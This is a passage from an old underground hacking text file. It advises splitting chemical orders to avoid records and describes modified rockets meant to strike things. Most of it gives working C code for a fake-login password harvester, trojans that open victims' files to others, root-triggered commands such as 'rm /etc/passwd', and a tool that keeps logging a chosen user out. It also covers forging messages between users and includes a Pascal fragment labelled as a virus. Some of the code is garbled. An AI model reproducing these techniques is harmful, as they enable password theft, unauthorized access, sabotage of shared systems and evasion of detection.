  4254. mixed together. They also know that someone who orders a bunch of chlorates,
  4255. nitrates, metal dusts, sulfur, and the like, probably has mischeif in mind,
  4256. and they keep records. So break your orders up, order from different supply
  4257. houses, get some friends to order some of the materials, and try to order the
  4258. things long before you plan do do anything with them. It's a pain, and the
  4259. multiple orders cost a lot in extra shipping charges, but that's what it costs
  4260. to cover your tracks. DO it!
  4261.  
  4262.  
  4263.  
  4264.  
  4265.  
  4266.  
  4267.   ∩7Å3 è                              Super Bottle Rockets
  4268.  
  4269.     Go down to a hobby shop and buy some Estes rocket engines and some small
  4270. dowels, you can make these babies.  Attach the dowel to the rocket casing with
  4271. tape or glue and be SURE to plug you the top end of the engine so you get a
  4272. bigger bang for your money.  Epoxy works well for this.  The great thing about
  4273. it is that they go VERY FAST and VERY FAR.  The speed is enough to knock out
  4274. anything easily.  You can go for A, B, C, or D engines but remember that the
  4275. heavier and more powerful the engine, the longer the dowel you will need.  Buy
  4276. the C6-7 engines with a 6 second burn and 7 second delay for discharge.
  4277.  
  4278.  
  4279.  
  4280.                               ------------------
  4281.                               UNIX Trojan Horses
  4282.                               ------------------
  4283.  
  4284. Introduction
  4285. ------------
  4286.  
  4287.      "UNIX Security" is an oxymoron.  It's an easy system to bruteforce hack
  4288. (most UNIX systems don't hang up after x number of login tries, and there are
  4289. a number of default logins, such as root, bin, sys and uucp).  Once you're in
  4290. the system, you can easily bring it to its knees or, if you know a little 'C',
  4291. you can make the system work for you and totally eliminate the security
  4292. barriers to creating your own logins, reading anybody's files, etcetera.  This
  4293. file will outline such ways by presenting 'C' code that you can implement
  4294. yourself.
  4295.  
  4296. Requirements
  4297. ------------
  4298.      You'll need a working account on a UNIX system.  It should be a fairly
  4299. robust version of UNIX (such as 4.2bsd or AT&T System V) running on a real
  4300. machine (a PDP/11, VAX, Pyramid, etc.) for the best results.  If you go to
  4301. school and have an account on the school system, that will do perfectly.
  4302.  
  4303. Notes
  4304. -----
  4305.      This file was inspired an article in the April, '86 issue of BYTE
  4306. entitled "Making UNIX Secure."  In the article, the authors say "We provide
  4307. this information in a way that, we hope, is interesting and useful yet stops
  4308. short of being a 'cookbook for crackers.'  We have often intentionally omitted
  4309. details."  I am following the general outline of the article, giving explicit
  4310. examples of the methods they touched on.
  4311.  
  4312.  
  4313. Project One:  Fishing For Passwords
  4314. -----------------------------------
  4315.  
  4316.      You can implement this with only a minimal knowledge of UNIX and C.
  4317. However, you need access to a terminal that many people use - the computer lab
  4318. at your school, for example.
  4319.  
  4320.      When you log onto a typical UNIX system, you see something like this:
  4321.   ∩7Å3 èTiburon Systems 4.2bsd / System V (shark)
  4322.  
  4323.  
  4324. login: shark
  4325. Password:      (not printed)
  4326.  
  4327.      The program I'm giving you here simulates a logon sequence.  You run the
  4328. program from a terminal and then leave.  Some unknowing fool will walk up and
  4329. enter their login and password.  It is written to a file of yours, then "login
  4330. incorrect" is printed, then the fool is asked to log in again.  The second
  4331. time it's the real login program.  This time the person succeeds and they are
  4332. none the wiser.
  4333.  
  4334.      On the system, put the following code into a file called 'horse.c'.  You
  4335. will need to modify the first 8 lines to fit your system's appearance.
  4336.  
  4337.  
  4338. ----- Code Begins Here -----
  4339.  
  4340. /* this is what a 'C' comment looks like.  You can leave them out. */
  4341.  
  4342. /* #define's are like macros you can use for configuration. */
  4343.  
  4344. #define SYSTEM "\n\nTiburon Systems 4.2bsd UNIX (shark)\n\n"
  4345.  
  4346. /* The above string should be made to look like the message that your
  4347.  * system prints when ready.  Each \n represents a carriage return.
  4348.  */
  4349.  
  4350. #define LOGIN  "login: "
  4351.  
  4352. /* The above is the login prompt.  You shouldn't have to change it
  4353.  * unless you're running some strange version of UNIX.
  4354.  */
  4355.  
  4356. #define PASSWORD "password:"
  4357.  
  4358. /* The above is the password prompt.  You shouldn't have to change
  4359.  * it, either.
  4360.  */
  4361.  
  4362. #define WAIT 2
  4363.  
  4364. /* The numerical value assigned to WAIT is the delay you get after
  4365.  * "password:" and before "login incorrect."  Change it (0 = almost
  4366.  * no delay, 5 = LONG delay) so it looks like your system's delay.
  4367.  * realism is the key here - we don't want our target to become
  4368.  * suspicious.
  4369.  */
  4370.  
  4371.  
  4372. #define INCORRECT "Login incorrect.\n"
  4373.  
  4374. /* Change the above so it is what your system says when an incorrect
  4375.  * login is given.  You shouldn't have to change it.  ∩7Å3 è */
  4376.  
  4377. #define FILENAME "stuff"
  4378.  
  4379. /* FILENAME is the name of the file that the hacked passwords will
  4380.  * be put into automatically.  'stuff' is a perfectly good name.
  4381.  */
  4382.  
  4383. /* Don't change the rest of the program unless there is a need to
  4384.  * and you know 'C'.
  4385.  */
  4386.  
  4387. #include <curses.h>
  4388. #include <signal.h>
  4389. int stop();
  4390.  
  4391. main()
  4392. {
  4393. char name[10], password[10];
  4394. int i;
  4395. FILE *fp, *fopen();
  4396. signal(SIGINT,stop);
  4397. initscr();
  4398. printf(SYSTEM);
  4399. printf(LOGIN);
  4400. scanf("%[^\n]",name);
  4401. getchar();
  4402. noecho();
  4403. printf(PASSWORD);
  4404. scanf("%[^\n]",password);
  4405. printf("\n");
  4406. getchar();
  4407. echo();
  4408. sleep(WAIT);
  4409.  
  4410.  
  4411. if ( ( fp = fopen(FILENAME,"a") )  != NULL ) {
  4412. #fprintf(fp,"login %s has password %s\n",name,password);
  4413. #fclose(fp);
  4414. #}
  4415.  
  4416. printf(INCORRECT);
  4417. endwin();
  4418. }
  4419.  
  4420. stop()
  4421. {
  4422. endwin();
  4423. exit(0);
  4424. }
  4425.  
  4426.  
  4427. ----- Source Ends Here -----
  4428.  
  4429.      OK, as I said, enter the above and configure it so it looks exactly like  ∩7Å3 èyour system's login sequence.  To compile this program called 'horse.c' type
  4430. the following two lines: (don't type the %'s, they are just a sample prompt)
  4431.  
  4432. % cc horse.c -lcurses -ltermcap
  4433. % mv a.out horse
  4434.  
  4435. You now have the working object code in a file called 'horse'.  Run it, and if
  4436. it doesn't look like your systems logon sequence, re-edit horse.c and
  4437. recomplie it.  When you're ready to put the program into use, create a new
  4438. file and call it 'trap' or something.  'trap' should have these two commands:
  4439.  
  4440. horse                    (this runs your program)
  4441. login                    (this runs the real login program)
  4442.  
  4443. to execute 'trap' type:
  4444.  
  4445. % source trap            (again, don't type the %)
  4446.  
  4447. and walk away from your terminal...
  4448.  
  4449. After you've run it successfully a few times, check your file called
  4450. 'stuff' (or whatever you decided to call it).  It will look like this:
  4451.  
  4452. user john has password secret
  4453. user mary has password smegma
  4454. etc.
  4455.  
  4456. Copy down these passwords, then delete this file (it can be VERY incriminating
  4457. if the superuser sees it).
  4458.  
  4459. Note - for best results your terminal should be set to time-out after a few
  4460. minutes of non-use - that way, your horse program doesn't run idle for 14
  4461. hours if nobody uses the terminal you ran it on.
  4462.  
  4463. -----
  4464.  
  4465. The next projects can be run on a remote system, such as the VAX in Michigan
  4466. you've hacked into, or Dartmouth's UNIX system, or whatever.  However, they
  4467. require a little knowledge of the 'C' language.  They're not something for
  4468. UNIX novices.
  4469.  
  4470. Project Two:  Reading Anybody's Files
  4471. -------------------------------------
  4472.  
  4473. When somebody runs a program, they're the owner of the process created and
  4474. that program can do anything they would do, such as delete a file in their
  4475. directory or making a file of theirs available for reading by anybody.
  4476.  
  4477. When people save old mail they get on a UNIX system, it's put into a file
  4478. called mbox in their home directory.  This file can be fun to read but is
  4479. usually impossible for anybody but the file's owner to read.  Here is a short
  4480. program that will unlock (i.e. chmod 777, or let anybody on the system read,
  4481. write or execute) the mbox file of the person who runs the program:
  4482.  
  4483. ----- Code Begins Here -----  ∩7Å3 è
  4484. #include <pwd.h>
  4485.  
  4486. struct passwd *getpwnam(name);
  4487. struct passwd *p;
  4488. char buf[255];
  4489.  
  4490. main()
  4491. {
  4492. p = getpwnam(getlogin());
  4493. sprintf(buf,"%s/%s",p->pw_dir,"mbox");
  4494. if ( access(buf,0) > -1 ) {
  4495.         sprintf(buf,"chmod 777 %s/%s",p->pw_dir,"mbox");
  4496.         system(buf);
  4497.         }
  4498. }
  4499.  
  4500. ----- Code Ends Here -----
  4501.  
  4502. So the question is:  How do I get my target to run this program that's
  4503. in my directory?
  4504.  
  4505. If the system you're on has a public-messages type of thing (on 4.xbsd, type
  4506. 'msgs') you can advertise your program there.  Put the above code in another
  4507. program - find a utility or game program in some magazine like UNIX WORLD and
  4508. modify it and do the above before it does it's real thing.  So if you have a
  4509. program called tic-tac-toe and you've modified it to unlock the mbox file of
  4510. the user before it plays tic-tac-toe with him, advertise "I have a new tic-
  4511. tac-toe program running that you should all try.  It's in my directory." or
  4512. whatever.  If you don't have means of telling everybody on the system via a
  4513. public message, then just send mail to the specific people you want to trap.
  4514.  
  4515. If you can't find a real program to modify, just take the above program and
  4516. add this line between the two '}' lines at the end of the program:
  4517.  
  4518. printf("Error opening tic-tac-toe data file.  Sorry!\n");
  4519.  
  4520. when the program runs, it will print the above error message.  The user will
  4521. think "Heh, that dude doesn't know how to write a simple tic-tac-toe program!"
  4522. but the joke's on him - you can now read his mail.
  4523.  
  4524. If there's a specific file in a user's directory that you'd like to read (say
  4525. it's called "secret") just throw together this general program:
  4526.  
  4527.  
  4528. main()
  4529. {
  4530. if ( access("secret",0) > -1 ) system("chmod 777 secret");
  4531. }
  4532.  
  4533. then 'talk' or 'write' to him and act like Joe Loser: "I wrote this program
  4534. called super_star_wars, will you try it out?"
  4535.  
  4536. You can use your imagination.  Think of a command you'd like somebody to
  4537. execute.  Then put it inside a system() call in a C program and trick them  ∩7Å3 èinto running your program!
  4538.  
  4539. Here's a very neat way of using the above technique:
  4540.  
  4541. Project Three: Become the superuser
  4542. -----------------------------------
  4543.  
  4544. Write a program that you can get people to run.  Put this line in it
  4545. somewhere:
  4546.  
  4547. if ( !strcmp(getlogin(),"root") ) system("whatever you want");
  4548.  
  4549. This checks to see if the root login is running your program.  If he is, you
  4550. can have him execute any shell command you'd like.  Here are some suggestions:
  4551.  
  4552. "chmod 666 /etc/passwd"
  4553.  
  4554.      /etc/passwd is the system's password file.  The root owns this file.
  4555. Normally, everyone can read it (the passwords are encrypted) but only the root
  4556. can write to it.  Take a look at it and see how it's formatted if you don't
  4557. know already.  This command makes it possible for you to now write to the file
  4558. - i.e. create unlimited accounts for yourself and your friends.
  4559.  
  4560. "chmod 666 /etc/group"
  4561.  
  4562.      By adding yourself to some high-access groups, you can open many
  4563. doors.
  4564.  
  4565. "chmod 666 /usr/lib/uucp/L.sys"
  4566.  
  4567.      Look for this file on your system if it is on the uucp net.  It contains
  4568. dialups and passwords to other systems on the net, and normally only the uucp
  4569. administrator can read it.  Find out who owns this file and get him to
  4570. unknowingly execute a program to unlock it for you.
  4571.  
  4572. "rm /etc/passwd"
  4573.  
  4574.      If you can get the root to execute this command, the system's passwd file
  4575. will be removed and the system will go down and will not come up for some time
  4576. to come.  This is very destructive.
  4577.  
  4578. -----
  4579.  
  4580. If you are going to go about adding a trojan horse program to the system,
  4581. there are some rules you should follow.  If the hidden purpose is something
  4582. major (such as unlocking the user's mbox or deleting all of his files or
  4583. something) this program shouldn't be a program that people will be running a
  4584. lot (such as a popular computer game) - once people discover that their files
  4585. are public access the source of the problem will be discovered quite easily.
  4586. Save this purpose for a 'test' program (such as a game you're in the process
  4587. of writing) that you ask individual people to run via mail or 'chatting' with
  4588. them.  As I said, this 'test' program can bomb or print a phony error message
  4589. after completing its task, and you will just tell the person "well, I guess
  4590. it needs more work", wait until they log off, and then read whatever file of
  4591. theirs that you've unlocked.  If your trojan horse program's sole purpose is  ∩7Å3 èto catch a specific user running it - such as the root or other high-powered
  4592. user - you can put the code to do so in a program that will be run a lot by
  4593. various users of the system.  Your modification will remain dormant until he
  4594. runs it.  If you can't find the source to 'star trek' or whatever in C, just
  4595. learn C and convert something from pascal.  It can't hurt to learn C as it's a
  4596. great language.  We've just seen what it can do on a UNIX system.  Once you've
  4597. caught the root (i.e. you can now modify the /etc/passwd file) remove the
  4598. spurious code from your trojan horse program and you'll never be caught. 
  4599.  
  4600.  
  4601.  
  4602.                                Unix - Odds & Ends
  4603.  
  4604. --  ------- ----- --- --- ------
  4605. 1.  Keeping Users Off The System
  4606. --  ------- ----- --- --- ------
  4607.  
  4608. Now, we all know by now how to log users off (one way is to redirect
  4609. an 'stty 0' command to their tty) but unless you have root privs, this
  4610. will not work when a user has set 'mesg n' and prevented other users from
  4611. writing to their terminal.  But even users who have a 'mesg n' command in
  4612. their .login (or .profile or .cshrc) file still have a window of vulnerability,
  4613. the time between login and the locking of their terminal.  I designed the
  4614. following program, block.c, to take advantage of this fact.
  4615.  
  4616. To get this source running on your favorite Unix system, upload it,
  4617. call it 'block.c', and type the following at the % or $ prompt:
  4618.  
  4619. cc -o block block.c
  4620.  
  4621. once you've compiled it successfully, it is invoked like so:
  4622.  
  4623. block username [&]
  4624.  
  4625. The & is optional and recommended - it runs the program in the background,
  4626. thus letting you do other things while it's at work.
  4627.  
  4628. If the user specified is logged in at present, it immediately logs
  4629. them out (if possible) and waits for them to log in.  If they aren't logged
  4630. in, it starts waiting for them.  If the user is presently logged in but
  4631. has their messages off, you'll have to wait until they've logged out to
  4632. start the thing going.
  4633.  
  4634. Block is essentially an endless loop : it keeps checking for the occurence
  4635. of the username in /etc/utmp.  When it finds it, it immediately logs them
  4636. out and continues.  If for some reason the logout attempt fails, the program
  4637. aborts.  Normally this won't happen - the program is very quick when run
  4638. unmodified.  However, to get such performance, it runs in a very tight
  4639. loop and will eat up a lot of CPU time.  Notice that near the end of the
  4640. program there is the line:
  4641.  
  4642. /*sleep(SLEEP)   */
  4643.  
  4644. the /* and */ are comment delimiters - right now the line is commented
  4645. out.  If you remove the comments and re-compile the program, it will then  ∩7Å3 è'go to sleep' for the number of seconds defined in SLEEP (default is 5)
  4646. at the end of every loop.  This will save the system load but will slightly
  4647. decrease the odds of catching the user during their 'window of vulnerability.'
  4648.  
  4649. If you have a chance to run this program at a computer lab at a school or
  4650. somewhere similar, run this program on a friend (or an enemy) and watch
  4651. the reaction on their face when they repeatedly try to log in and are
  4652. logged out before they can do *anything*.  It is quite humorous.  This
  4653. program is also quite nasty and can make you a lot of enemies!
  4654.  
  4655. caveat #1:  note that if you run the program on yourself, you will be logged
  4656. out, the program will continue to run (depending on the shell you're under)
  4657. and you'll have locked yourself out of the system - so don't do this!
  4658.  
  4659. caveat #2:  I wrote this under OSx version 4.0, which is a licensed version
  4660. of Unix which implements 4.3bsd and AT&T sysV.  No guarantees that it will
  4661. work on your system.
  4662.  
  4663. caveat #3:  If you run this program in background, don't forget to kill
  4664. it when you're done with it!  (when you invoke it with '&', the shell will
  4665. give you a job number, such as '[2] 90125'.  If you want to kill it later
  4666. in the same login session, type 'kill %2'.  If you log in later and want
  4667. to kill it, type 'kill 90125'.  Just read the man page on the kill command
  4668. if you need any help...
  4669.  
  4670. ----- cut here -----
  4671.  
  4672. /* block.c -- prevent a user from logging in
  4673.  * by Shooting Shark
  4674.  * usage : block username [&]
  4675.  * I suggest you run this in background.
  4676.  */
  4677.  
  4678. #include <stdio.h>
  4679. #include <utmp.h>
  4680. #include <ctype.h>
  4681. #include <termio.h>
  4682. #include <fcntl.h>
  4683.  
  4684. #define W_OK2
  4685. #define SLEEP5
  4686. #define UTMP"/etc/utmp"
  4687. #define TTY_PRE "/dev/"
  4688.  
  4689. main(ac,av)
  4690. int ac;
  4691. char *av[];
  4692. {
  4693. int target, fp, open();
  4694. struct utmpuser;
  4695. struct termio*opts;
  4696. char buf[30], buf2[50];
  4697.  
  4698. if (ac != 2) {
  4699. printf("usage : %s username\n",av[0]);  ∩7Å3 èexit(-1);
  4700. }
  4701.  
  4702.  
  4703. for (;;) {
  4704.  
  4705. if ((fp = open(UTMP,0)) == -1) {
  4706. printf("fatal error!  cannot open %s.\n",UTMP);
  4707. exit(-1);
  4708. }
  4709.  
  4710.  
  4711. while (read(fp, &user, sizeof user) > 0) {
  4712. if (isprint(user.ut_name[0])) {
  4713. if (!(strcmp(user.ut_name,av[1]))) {
  4714.  
  4715. printf("%s is logging in...",user.ut_name);
  4716. sprintf(buf,"%s%s",TTY_PRE,user.ut_line);
  4717. printf("%s\n",buf);
  4718. if (access(buf,W_OK) == -1) {
  4719. printf("failed - program aborting.\n");
  4720. exit(-1);
  4721. }
  4722. else {
  4723. if ((target = open(buf,O_WRONLY)) != EOF) {
  4724. sprintf(buf2,"stty 0 > %s",buf);
  4725. system(buf2);
  4726. printf("killed.\n");
  4727. sleep(10);
  4728. }
  4729.  
  4730. } /* else */
  4731. } /* if strcmp */
  4732. } /* if isprint */
  4733. } /* while */
  4734. close(fp);
  4735.  
  4736. /*sleep(SLEEP);  */
  4737.  
  4738. } /* for */
  4739.  
  4740.  
  4741.  
  4742.  
  4743.  
  4744. }
  4745.  
  4746. ----- cut here -----
  4747.  
  4748.  
  4749. --  ------------- ----- ----- ---- ------  --- ------
  4750. 2.  Impersonating other users with 'write' and 'talk'
  4751. --  ------------- ----- ----- ---- ------  --- ------
  4752.  
  4753. This next trick wasn't exactly a work of stupefying genius, but is a  ∩7Å3èlittle trick (that anybody can do) that I sometimes use to amuse myself
  4754. and, as with the above, annoy the hell out of my friends and enemies.
  4755.  
  4756. Nearly every Unix system has the 'write' program, for conversing with
  4757. other logged-in users.  As a quick summary:
  4758.  
  4759. If you see that user 'clara' is logged in with the 'who' or 'w' command
  4760. or whatever, and you wish to talk to her for some reason or another,
  4761. you'd type 'write clara'.  Clara then would see on her screen something
  4762. like this (given that you are username 'shark'):
  4763.  
  4764.  
  4765. [3 ^G's] Message from shark on ttyi13 at 23:14 ...
  4766.  
  4767. You then type away at her, and whatever you type is sent to her terminal
  4768. line-by-line.  If she wanted to make it a conversation rather than a
  4769. monologue, she'd type 'write shark,' you'd get a message similar to the above
  4770. on your terminal, and the two of you would type away at each other to your
  4771. little heart's content.  If either one of you wanted to end the conversation,
  4772. you would type a ^D.  They would then see the characters 'EOF' on their
  4773. screen, but they'd still be 'write'ing to you until they typed a ^D as well.
  4774.  
  4775. Now, if you're on a bigger installation you'll probably have some sort
  4776. of full-screen windowing chat program like 'talk'.  My version of talk
  4777. sends the following message:
  4778.  
  4779. Message from Talk_Daemon@tibsys at 23:14 ...
  4780. talk: connection requested by shark@tibsys.
  4781. talk: respond with:  talk shark@tibsys
  4782.  
  4783. Anyway, here's where the fun part begins:  It's quite easy to put a sample
  4784. 'write' or 'talk' message into a file and then edit so that the 'from'
  4785. is a different person, and the tty is listed differently.  If you see that
  4786. your dorky friend roger is on ttyi10 and the root also happens to be
  4787. logged on on ttyi01, make the file look something like this:
  4788.  
  4789. [3 control-G's] Message from root on ttyi01 at [the current time]
  4790.  
  4791. wackawackawackawackawacka!!!
  4792.  
  4793. [or a similarly confusing or rude message...]
  4794.  
  4795. EOF
  4796.  
  4797. Then, send this file to roger's terminal with:
  4798.  
  4799. cat filename > /dev/ttyi10
  4800.  
  4801. He'll get the message on his terminal and wonder what the hell the
  4802. superuser is talking about.  He might even 'write' back to the superuser
  4803. with the intent of asking 'what the hell are you talking about?'.  For
  4804. maximum effectiveness, *simultaneously* send a message to root 'from'
  4805. roger at the appropriate terminal with an equally strange message - they'll
  4806. then engage in a conversation that will go something like "what did you
  4807. mean by that?"  "what do you mean, what do I mean?  What did *you* mean  ∩7Å3 èby that?" etc.  A splendid time is guaranteed for all!  Note that you don't
  4808. have to make 'root' the perpetrator of the gag, any two currently logged-in
  4809. users who have their terminals open for messages can join in on the fun.
  4810.  
  4811. Similarly, you can fake a few 'talk' pages from/to two people...they will
  4812. then probably start talking...although the conversation will be along the
  4813. lines of "what do you want?"  "you tell me."  "you paged me, you tell *me."
  4814. etcetera, while you laugh yourself silly or something like that.
  4815.  
  4816. A variation on the theme:  As I said, when using 'write' you type a ^D to
  4817. end the conversation, and the person you're typing at sees an 'EOF' on
  4818. their screen.  But you could also just *type* 'EOF', and they'd think
  4819. you've quit...but you still have an open line to their terminal.  Even
  4820. if they later turn messages off, you still have the ability to write to
  4821. their terminal.  Keeping this fact in mind, anybody who knows what they're
  4822. doing can write a program similar to my 'block' program above that doesn't
  4823. log a user out when they appear on the system, but opens their tty as
  4824. a device and keeps the file handle in memory so you can redirect to their
  4825. terminal - to write rude messages or to log them out or whatever - at any
  4826. time, until they log out.
  4827.  
  4828.  
  4829.  
  4830. {modified version of Arpnet virus:Pascal should be redif to ASM}
  4831. {obj are ok compile will attach with viru@2 mechanizism..per @Trash33}
  4832. {makes the disk space packets and eats all avalible space,loop it  }
  4833. {Enjoy and modify this is root version...aka SHADOWSPAWN}
  4834. Unit  Netsnd;
  4835. Interface
  4836. Uses  Crt, Dos, Consts, Types, Iostuff, Routing,
  4837.       Netvars, Netfncs, Netrcv, Btree, Filedecs;
  4838. PROCEDURE make_packets;
  4839. Implementation
  4840. {--------MAKE PACKETS AND PACKETS AND PACKETS--------------------------------}
  4841. PROCEDURE make_packets;
  4842. VAR   msg_counter : INTEGER;
  4843.       tmp_ptr     : node_info_ptr;
  4844.       month,day,year,dow : WORD;
  4845.       hour,minute,second,hund : WORD;
  4846.       temp        : line;
  4847.       rl          : LONGINT;
  4848.       x           : INTEGER;
  4849.       new_net     : INTEGER;
  4850.       new_node    : INTEGER;
  4851.       attr        : INTEGER;
  4852.       fwd         : BOOLEAN;
  4853.       ch          : CHAR;
  4854.       t1,t2,t3    : INTEGER;
  4855.       i,j         : INTEGER;
  4856.       seen        : BOOLEAN;
  4857.       more        : BOOLEAN;
  4858.       lrnum       : lrnumber;
  4859.       lrtmp       : LONGINT;
  4860.       tmp         : short_string;
  4861.    {-------------------SET UP FOR NET NODE PACKETS---------------------------}  ∩7Å3 è   PROCEDURE construct_packet(new_net, new_node: INTEGER);
  4862.    VAR   first_pk : INTEGER;
  4863.    BEGIN
  4864.       INC(msg_counter);
  4865.       tmp_ptr := node_c;
  4866.       first_pk := -1;
  4867.       WHILE (tmp_ptr <> NIL) AND
  4868.          NOT ((tmp_ptr^.net = new_net) AND
  4869.          (tmp_ptr^.node = new_node)) DO BEGIN
  4870.          tmp_ptr := tmp_ptr^.ptr
  4871.       END;
  4872.       IF tmp_ptr = NIL THEN
  4873.          BEGIN
  4874.             NEW(tmp_ptr);
  4875.             FILLCHAR(tmp_ptr^,SIZEOF(node_info),0);
  4876.             tmp_ptr^.ptr := node_c;
  4877.             node_c := tmp_ptr;
  4878.             node_c^.net := new_net;
  4879.             node_c^.node := new_node;
  4880.             node_c^.tries := 0;
  4881.             node_c^.connects := 0;
  4882.             node_c^.success := FALSE;
  4883.             ASSIGN(pk_index,default.database_drive + pkindexfile);
  4884.             {$I-} RESET(pk_index); {$I+}
  4885.             IF IOresult = 0 THEN
  4886.                BEGIN
  4887.                   x := 0;
  4888.                   pk_idx.net := 0;
  4889.                   pk_idx.node := 0;
  4890.                   WHILE NOT EOF(pk_index) AND
  4891.                      NOT ((pk_idx.net = new_net) AND (pk_idx.node = new_node)) DO BEGIN
  4892.                      READ(pk_index,pk_idx);
  4893.                      IF pk_idx.avail AND (first_pk < 0) THEN
  4894.                         first_pk := x;
  4895.                      INC(x)
  4896.                   END;
  4897.                   IF (pk_idx.net = new_net) AND (pk_idx.node = new_node) THEN
  4898.                      BEGIN
  4899.                         node_c^.pk_num := x - 1;
  4900.                         first_pk := -1
  4901.                      END
  4902.                   ELSE
  4903.                      BEGIN
  4904.                         IF first_pk < 0 THEN
  4905.                            first_pk := FILESIZE(pk_index);
  4906.                         node_c^.pk_num := first_pk;
  4907.                         pk_idx.avail := FALSE;
  4908.                         pk_idx.sent := FALSE;
  4909.                         pk_idx.attempts := 0;
  4910.                         pk_idx.net := new_net;
  4911.                         pk_idx.node := new_node;
  4912.                         SEEK(pk_index,first_pk);
  4913.                         WRITE(pk_index,pk_idx)
  4914.                      END
  4915.                END  ∩7Å3 è            ELSE
  4916.                BEGIN
  4917.                   REWRITE(pk_index);
  4918.                   first_pk := 0;
  4919.                   node_c^.pk_num := 0;
  4920.                   pk_idx.avail := FALSE;
  4921.                   pk_idx.sent := FALSE;
  4922.                   pk_idx.attempts := 0;
  4923.                   pk_idx.net := new_net;
  4924.                   pk_idx.node := new_node;
  4925.                   SEEK(pk_index,first_pk);
  4926.                   WRITE(pk_index,pk_idx)
  4927.                END;
  4928.             CLOSE(pk_index);
  4929.             ASSIGN(p_info,default.database_drive + 'PK' + dual(node_c^.pk_num) + '.XMT');
  4930.             {$I-} RESET(p_info); {$I+}
  4931.             IF (IOresult = 0) AND (first_pk >=0) THEN
  4932.                CLOSE(p_info)
  4933.             ELSE
  4934.                BEGIN
  4935.                   REWRITE(p_info);
  4936.                   GETDATE(year,month,day,dow);
  4937.                   GETTIME(hour,minute,second,hund);
  4938.                   packet.year := year;
  4939.                   packet.month := month;
  4940.                   packet.day := day;
  4941.                   packet.hour := hour;
  4942.                   packet.minute := minute;
  4943.                   packet.second := second;
  4944.                   WITH packet DO BEGIN
  4945.                      orig_net := default.net;
  4946.                      dest_net := new_net;
  4947.                      orig_node := default.node;
  4948.                      dest_node := new_node;
  4949.                      baud_rate := 1200;
  4950.                      pk_ver := packet_version;
  4951.                      prod_code := product_code;
  4952.                      FILLCHAR(fill,SIZEOF(fill),0)
  4953.                   END;
  4954.                   WRITE(p_info,packet);
  4955.                   CLOSE(p_info)
  4956.                END
  4957.          END;
  4958. { The following code will construct the actual message that is to be
  4959.   transmitted. I'm sure some intelligent soul out there can figure out
  4960.   that this section of code can be replaced to transmit anything as the
  4961.   packet is a protocol level above the information actually being transmitted
  4962.   to the destination node... }
  4963.       ASSIGN(packets,default.database_drive + 'PK' + dual(tmp_ptr^.pk_num) + '.XMT');
  4964.       RESET(packets);
  4965.       SEEK(packets,FILESIZE(packets));
  4966.       temp := convert(mesg.org_time.date,rl);
  4967.       temp := day_of_week[rl MOD 7] + ' '
  4968.             + dual(value(COPY(mesg.org_time.date,4,2))) + ' '
  4969.             + month_of_year[value(COPY(mesg.org_time.date,1,2))] + ' '  ∩7Å3è            + dual(value(COPY(mesg.org_time.date,7,2))) + ' '
  4970.             + dual(value(COPY(mesg.org_time.time,1,2))) + ':'
  4971.             + dual(value(COPY(mesg.org_time.time,4,2))) + NULL;
  4972.       write_int($0002);                     {Packet header}
  4973.       write_int(mesg.orig_node);            {Originating node}
  4974.       write_int(mesg.dest_node);            {Destination node}
  4975.       write_int(mesg.orig_net);             {Originating net}
  4976.       write_int(mesg.dest_net);             {Destination net}
  4977.       attr := mesg.flags AND $7413;         {Zero required attributes}
  4978.       write_int(attr);                      {File attribute}
  4979. {?}   write_int($0000);                     {File transmission cost}
  4980.       write_line(temp);                     {Date/Time group}
  4981.       write_line(mesg.dest_user + NULL);    {Who message is to}
  4982.       write_line(mesg.org_user + NULL);     {Who it is from};
  4983.       write_line(mesg.title + NULL);        {Subject of message};
  4984.       x := 0;
  4985.       WHILE (mesg_text[x + 1] <> '') AND (x < max_msg_entry) DO BEGIN
  4986.          INC(x);
  4987.          write_line(mesg_text[x] + CR);
  4988.          IF POS('Message ID: ',mesg_text[x]) > 0 THEN
  4989.             BEGIN
  4990.                temp := COPY(mesg_text[x],POS('Message ID: ',mesg_text[x]) + 12,9);
  4991.                tmp := convert(system_date,lrtmp);
  4992.                lrnum := lrtmp;
  4993.                insertvalueinbtree(pkfile,lrnum,temp)
  4994.             END
  4995.       END;
  4996.       write_line(mesg_text[x + 1] + NULL);
  4997.       write_int($0000);                    {End of packet}
  4998.       CLOSE(packets)
  4999.    END;
  5000.    {---THIS IS JUST FOR FUN    BETTER TO LEAVE OUT UNLESS YOU WANT TO TRAIL--}
  5001. BEGIN
  5002.    openwindow(40,5,76,15,'Mail packet construction',YELLOW,back,4);
  5003.    setcolor(fore,back);
  5004.    writest('Constructing transmission packets',2,2);
  5005.    WRITELN(log_file,'Making the mail packets...',system_date,' ',system_time);
  5006.    node_c := NIL;
  5007.    msg_counter := 0;
  5008.    ASSIGN(mesg_dir,default.msg_drive + msg_file_dir);
  5009.    {$I-} RESET(mesg_dir); {$I+}
  5010.    IF IOresult <> 0 THEN
  5011.       BEGIN
  5012.          WRITELN(log_file,'I can''t open the message directory!');
  5013.          writest('ERROR: Cannot open the message directory',2,4);
  5014.          EXIT
  5015.       END;
  5016.    t1 := 9;                    { Note: This is the networking base }
  5017.    REPEAT
  5018.       SEEK(mesg_dir,t1);
  5019.       READ(mesg_dir,mesg);
  5020.       t1 := mesg.dir_link;
  5021.       t2 := mesg.sub_dir_link;
  5022.       WHILE t2 > 0 DO BEGIN
  5023.          SEEK(mesg_dir,t2);  ∩7Å3 è         READ(mesg_dir,mesg);
  5024.          t2 := mesg.dir_link;
  5025.          t3 := mesg.sub_dir_link;
  5026.          IF t3 > 0 THEN
  5027.             BEGIN
  5028.                SEEK(mesg_dir,t3);
  5029.                READ(mesg_dir,mesg);
  5030.                t3 := mesg.sub_dir_link;
  5031.                SEEK(mesg_dir,t3);
  5032.                READ(mesg_dir,mesg);
  5033.                REPEAT
  5034.                   IF (mesg.dir_type = message) AND
  5035.                      test_bit(msg_bit + (t3 DIV 1024),t3 MOD 1024) AND
  5036.                      bit(mesg.flags,8) OR bit(mesg.flags,5) THEN
  5037.                      BEGIN
  5038.                         read_for_edit(default.msg_drive + msg_msg_dir,mesg.msg_link,mesg_text);
  5039.                         more := FALSE;
  5040.                         new_net := 0;
  5041.                         new_node := 0;
  5042.                         REPEAT
  5043.                            fwd := FALSE;
  5044.                            get_route_info(mesg.dest_net,mesg.dest_node,
  5045.                                           new_net,new_node,fwd,more);
  5046.                            get_node_info(new_net,new_node,destnode);
  5047.                            i := 1;
  5048.                            seen := FALSE;
  5049.                            REPEAT
  5050.                               IF POS('Message ID:',mesg_text[i]) > 0 THEN
  5051.                                  seen := TRUE;
